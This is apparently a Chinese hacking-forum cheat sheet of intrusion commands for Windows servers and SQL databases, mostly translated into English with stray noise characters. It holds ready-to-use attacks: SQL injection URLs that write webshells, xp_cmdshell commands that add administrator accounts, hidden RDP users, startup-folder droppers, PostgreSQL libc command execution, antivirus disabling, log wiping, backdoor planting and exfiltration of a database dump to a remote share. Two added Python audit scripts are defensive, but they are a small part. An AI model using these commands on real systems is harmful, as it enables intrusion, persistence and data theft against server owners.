1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you log straight in; once inside, run net user administrator /passwordreq:yes to restore the setting.
2. A rather neat way to build a cloned account:
First create an ordinary user account,
then export its registry key, then delete the account in Computer Management,
then import the key again and add the account to the Administrators group.
3. Reading the Radmin password:
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a subkey named "services.exe",
then under it create a string value
whose data is the full path of the trojan.
5. runas /user:guest cmd
Use this to test a user's privileges.
6. tlntadmn config sec = -ntlm (or through SQL: exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--). This actually relies on the tlntadmn command; for details run it with /? (note that it requires administrator privileges). Creating an identically named user to pass NTLM authentication needs no explanation from me, right?
7. After the intrusion: patching the holes, cleaning traces, planting backdoors:
Basic vulnerabilities must be patched, such as SU privilege escalation and SA injection. For DBO injection, consider killing xp_treelist and xp_regread, and note down the web directory yourself; you absolutely must clean up your traces. For SQL Server connections it is better to use Enterprise Manager; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete them. For IIS logs, do not use AIO-type tools that wipe the logs completely; use a logcleaner-type tool that only deletes the access records for a given IP. If you can get the administrator password via gina, log in as him, clean the logs, and do the final trace cleanup with WYWZ. That said, manual cleanup is safer. Finally leave a backdoor that produces no log entries. Several one-line backdoors, a standard backdoor and a cfm backdoor are what I usually leave at minimum. Remember to change the timestamps. One more rather nasty trick: if the machine is just an ordinary zombie, drop a TXT on the administrator's desktop telling him you broke in, planted such-and-such backdoor and added such-and-such user (of course not your real, important backdoor) and ask him to clean it up. That way you have a good chance of keeping your real backdoor.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c

for example

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
9. MSSQL Server 2005 has xp_cmdshell switched off by default;
to enable it you must turn it on under advanced options.
You can inject it directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then: ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.

In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then: ;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
After the extended stored procedures have been deleted there is a very simple way to restore them:
Deletion:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
Restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores them directly, regardless of whether sp_addextendedproc still exists.
-----------------------------

Statement that deletes the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'

SQL to restore cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL to enable cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended stored procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is there.

Restore xp_cmdshell:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it worked.

Otherwise upload xplog70.dll:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL to block cmdshell:
sp_dropextendedproc 'xp_cmdshell'
-------------------------
Clear the 3389 login records with a built-in system command:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

then delete the Default.rdp file in the current account's My Documents folder.
View the current user's privileges in MySQL:
show grants for
The following statements give a user the same privileges as ROOT. You have probably run into this when taking a site: MySQL's root user may only connect locally and refuses outside connections. The method below solves that problem. The statements create a user itpro with password 123 and the same privileges as root, allowed to connect from any host, so you can conveniently operate on the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you are done, remember to erase your footprints.

Drop USER 'itpro'@'%';

Drop DATABASE IF EXISTS `itpro` ;
Get SYSTEM privileges as the current user:
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Code:
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec","user")
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Bypassing the CAPTCHA restriction to get into the back end and take a shell
Code:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save this as code.reg, import it into the registry and restart IE,
and that is all.
Writing a shell via UNION
Code:
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
Applied to the DedeCMS injection vulnerability, this writes a shell without needing the back end.
In the DedeCMS back end, when there is no file manager and no outfile privilege,
go to Plugin Management - Virus Scan
and write a one-liner into include/config_hand.php
Code:
>';?><?php @eval($_POST[cmd]);?>

in the format shown above.
In Oracle, after logging in as a low-privileged user you can run the following statement to query the hashes of sys and other users, then crack them with Cain:
Code:
select username,password from dba_users;
MySQL remote-connection user
Code:

Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
1. Find the terminal services port

XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
2. Enable terminal services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. Change the terminal services port to 20008 (0x4E28)

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4. Remove the XP & 2003 firewall restriction on terminal services port 3389 and its restriction on connecting IPs

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5. Enable the Win2000 terminal service on port 3389 (requires a reboot)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
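As an added example from the defender's side (not part of the original post): a small Python auditor that parses a .reg export such as the tsp.reg produced by regedit /e in step 1 and reports the Terminal Server settings that steps 2 to 5 touch: fDenyTSConnections, the PortNumber value under both keys, and GloballyOpenPorts firewall exceptions. The export text below is constructed sample data, and the finding wording is my own.

```python
import re

# Constructed sample of a "regedit /e" export (example data, not taken from any real host).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00004e28

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
"20008:TCP"="20008:TCP:*:Enabled:rdp"
"""

# Key paths are compared case-insensitively, so they are kept lowercase here.
TS_ROOT = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
PORT_KEYS = (TS_ROOT + r"\wds\rdpwd\tds\tcp", TS_ROOT + r"\winstations\rdp-tcp")
FW_LIST = (r"hkey_local_machine\system\currentcontrolset\services\sharedaccess\parameters"
           r"\firewallpolicy\standardprofile\globallyopenports\list")
DEFAULT_RDP_PORT = 3389

# "Name"=dword:xxxxxxxx  or  "Name"="string"
_VALUE = re.compile(r'^"(?P<name>[^"]+)"=(?:dword:(?P<dword>[0-9a-fA-F]{8})|"(?P<str>.*)")\s*$')


def parse_reg(text):
    """Parse a .reg export into {key_path_lowercase: {value_name: int | str}}."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor") or line == "REGEDIT4":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = _VALUE.match(line)
        if m is None or current is None:
            continue  # hex(...) binary values and continuation lines are not needed for this audit
        value = int(m.group("dword"), 16) if m.group("dword") is not None else m.group("str")
        keys[current][m.group("name")] = value
    return keys


def audit_rdp(keys):
    """Return human-readable findings about the Terminal Server configuration in the export."""
    findings = []
    if keys.get(TS_ROOT, {}).get("fDenyTSConnections") == 0:
        findings.append("Remote Desktop enabled: fDenyTSConnections=0")
    ports = {}
    for key in PORT_KEYS:
        port = keys.get(key, {}).get("PortNumber")
        if port is None:
            continue
        ports[key] = port
        if port != DEFAULT_RDP_PORT:
            findings.append("RDP listener moved to port %d (0x%X) under %s" % (port, port, key.rsplit("\\", 1)[1]))
    if len(set(ports.values())) > 1:
        findings.append("PortNumber differs between Wds\\rdpwd\\Tds\\tcp and WinStations\\RDP-Tcp: %s" % sorted(ports.values()))
    # Firewall exceptions with scope "*" admit every remote address.
    for name, value in keys.get(FW_LIST, {}).items():
        if isinstance(value, str) and ":*:Enabled" in value:
            findings.append("Firewall exception opens %s to every remote address" % name)
    return findings


if __name__ == "__main__":
    for finding in audit_rdp(parse_reg(SAMPLE_REG)):
        print(finding)
```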
6. Force a reboot of Win2000 & Win2003 (the system reboots automatically after the last command)

@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7. Disable TCP/IP port filtering (requires a reboot)

REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8. When the terminal server has exceeded its maximum number of connections, use the following command to connect:

mstsc /v:ip:3389 /console
9. Adjust NTFS partition permissions

cacls c: /e /t /g everyone:F (everyone gets full control of drive C)

cacls %systemroot%\system32\*.exe /d everyone (deny everyone access to the exe files in system32)
------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Delete the awgina.dll registry value
Code:

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Code:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
Set it to 1 to turn off LM hashes.
Database security: commonly used commands for intruding an Oracle database
Recently I came across a server running an Oracle database; after cramming Oracle and asking experts, I finally got all the user passwords for the site's back-end management interface. I found Oracle really tedious to operate, so to save you some detours I have compiled the commands that are needed during an intrusion.
1. su - oracle: not required; useful when you have no DBA password, since it lets you enter sqlplus without one.
2. sqlplus /nolog or sqlplus system/manager or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba ;(as sysoper) or
connect internal/oracle AS SYSDBA ;(scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup; starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$databases; view the database structure fields
7. How to see which users hold SYSDBA and SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
Show user; shows the user of the current database connection
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View the table structure: desc all_tables;
12. Show the full column structure of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Fetch the records in the CQI.T_BBS_XUSER table:
select * from CQI.T_BBS_XUSER;
14. Add a database user: (test11/test)
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant privileges to the user:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change database users' passwords: (change the sys and system passwords to test.)
alter user sys identified by test;
alter user system identified by test;
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml  database connection configuration
\WEB-INF\server.xml  comparable to http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml  file directory structure

spring.properties contains the name of the hibernate.cfg.xml

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml

If none of these can be found, look at the class files.
Viewing the shared folders inside a virtual machine:
run this in cmd inside the VM:
\\.host\Shared Folders
A trick for finding the terminal services port from cmdshell:
Finding the terminal service:
Step 1: Tasklist /SVC lists all processes and system services together with their PID values;
the service name for terminal services is TermService.
Step 2: use netstat -ano to list the PID for every port,
and find the port that corresponds to that PID.
Query the password hash in SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
Exporting a shell from Access

Complete code for adding a user through MySQL on a Chinese-language operating system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe'
drop table a;
A note on how to deal with that obnoxious Norton
Look up the path of the Norton service:
sc qc ccSetMgr
Then set permissions to deny access. Go all the way:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone

Then restart the server:
iisreset /reboot
That does it. But once finished, remember to restore the permissions:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
2 y' A- F' s' m2 ?7 M5 L0 ], n" |5 M! T5 }
Some notes on PostgreSQL injection
How to get a webshell:
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read a file:
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
There are two ways to execute commands: one needs a user-defined function backed by libc, the other uses PL/Python.
Of course, for these the PostgreSQL version must be greater than 8.x.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, sending its output to a file:
SELECT system('uname -a > /tmp/test')

Copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the command output back from the output table to check whether it succeeded:

SELECT system_out FROM stdout

Below is a test example:

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
net stop sharedaccess    stop the default firewall
netsh firewall show    show/config default firewall
netsh firewall set notifications disable    disable the notification shown when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost    add a program that the default firewall allows
How to change the 3389 port (after the change it is not easily found by scanners)
Change the port setting on the server side; two places in the registry need to be changed:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
the PortNumber value, 3389 by default; change it to the port you want, e.g. 6000

Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
the PortNumber value, 3389 by default; change it to the port you want, e.g. 6000

That is all; reboot the system and it takes effect.
A script to record 3389 remote logins
Save it as a bat file:
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
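An added example, not from the original post: a Python parser for the ts.log that the batch file above writes (a date /t line, a time /t line, then the netstat lines containing :3389), which keeps only established sessions on port 3389, counts them per remote address and lists the addresses that are not on an allow list. The log content, addresses and the allow list are constructed sample data.

```python
import re
from collections import Counter

# Constructed sample of ts.log as written by the batch file (example data, not a real capture).
SAMPLE_TS_LOG = """2011/07/17
04:00
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    192.168.1.10:3389      203.0.113.7:51234      ESTABLISHED
2011/07/18
09:15
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    192.168.1.10:3389      198.51.100.9:40001     ESTABLISHED
  TCP    192.168.1.10:3389      203.0.113.7:51300      ESTABLISHED
"""

_DATE = re.compile(r"^\d{4}/\d{2}/\d{2}")        # output of "date /t" (locale-dependent in reality)
_TIME = re.compile(r"^\d{1,2}:\d{2}")            # output of "time /t"
_CONN = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\w+)")  # one "netstat -n -p tcp" row


def parse_ts_log(text):
    """Turn the date/time/netstat groups into one record per established RDP session."""
    records = []
    date = time = None
    for line in text.splitlines():
        d = _DATE.match(line)
        if d:
            date = d.group(0)
            continue
        t = _TIME.match(line)
        if t:
            time = t.group(0)
            continue
        m = _CONN.match(line)
        # Keep only sessions actually established on the local 3389 listener;
        # the LISTENING row carries no remote peer.
        if m and m.group(2) == "3389" and m.group(5) == "ESTABLISHED":
            records.append({"date": date, "time": time, "local": m.group(1),
                            "remote": m.group(3), "remote_port": int(m.group(4))})
    return records


def summarize(records, allowed_remotes):
    """Count sessions per remote address and list the addresses outside the allow list."""
    counts = Counter(r["remote"] for r in records)
    unexpected = sorted(ip for ip in counts if ip not in allowed_remotes)
    return counts, unexpected


if __name__ == "__main__":
    sessions = parse_ts_log(SAMPLE_TS_LOG)
    per_ip, unknown = summarize(sessions, {"203.0.113.7"})   # constructed allow list
    for ip, n in per_ip.items():
        print("%-16s %d session(s)" % (ip, n))
    print("not on allow list:", unknown)
```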
" I9 g* P$ B- {
mstsc parameters:

Remote Desktop Connection

MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?

<Connection File> -- specifies the name of the .rdp file for the connection.

/v:<server[:port]> -- specifies the terminal server to connect to.

/console -- connects to the console session of the server.
/f -- starts the client in full-screen mode.
/w:<width> -- specifies the width of the remote desktop screen.

/h:<height> -- specifies the height of the remote desktop screen.

/edit -- opens the specified .rdp file for editing.

/migrate -- migrates legacy connection files created with Client Connection Manager
to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens another, virtual session, which amounts to logging on to the computer separately. In other words, a connection made with the console parameter is the desktop shown on the monitor. Give it a try; it comes in handy sometimes, especially for some software that
mstsc /console /v:124.42.126.xxx gets around the limit on the number of terminal connections

Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

control userpasswords2  view users' passwords
Export a shell directly from an Access database, provided table a exists in the Access database and you know the site's real path:
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a

141. When doing manual MSSQL injection, if you cannot bounce the data out in a write, most people read the records out one at a time, which is exhausting; here is a single statement that reads out all the data:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
How to shut down McAfee: // requires SYSTEM privileges; use at or psexec -s cmd.exe
You can upload .com-type files such as nc.com to bypass McAfee's executable restriction;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be obtained directly with vncdump, or by querying the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] from the command prompt.

exec master..xp_cmdshell 'net user'
Executes a command in MSSQL.
Query for obtaining MSSQL password hashes:
select name,password from master.dbo.sysxlogins

backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
MSSQL database shrinking

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses the file game_db_201107170400.BAK into 1.rar, split into 200M volumes.

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database as game.bak at the path D:\WebSites\game.com\UpFileList\game.bak

Key points for penetrating Discuz!NT 3.5:
(1) Visit <site>/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
(2) Open rss.aspx, copy <%@ Page Inherits="Discuz.Web.UI.RssPage" %> to a local backup, then replace it with <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
(3) Save.
(4) The one-line backdoor is then at http://somesite.com.cn/tools/rss.aspx, password pass.
d:\rar.exe a -r d:\1.rar d:\website\
Recursively packs the website directory; mind the path to rar.exe.
<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
A PHP one-liner planted in a config file through an unfiltered write: the ${...} inside the double-quoted string is evaluated as an expression, so eval() runs every time the file is included.
3 B5 ?8 n! H7 j! x, f
! [, p3 W F. T' }站库分离脱裤技巧
" A- \* r7 l& |5 h! mexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'5 O* i5 T+ X2 x- F# l
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'6 K. e8 F- \0 w* e& d! F
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。. Z( O; h5 W- V: M I( F. {$ s; M) ?
这儿利用的是马儿的专家模式(自己写代码)。
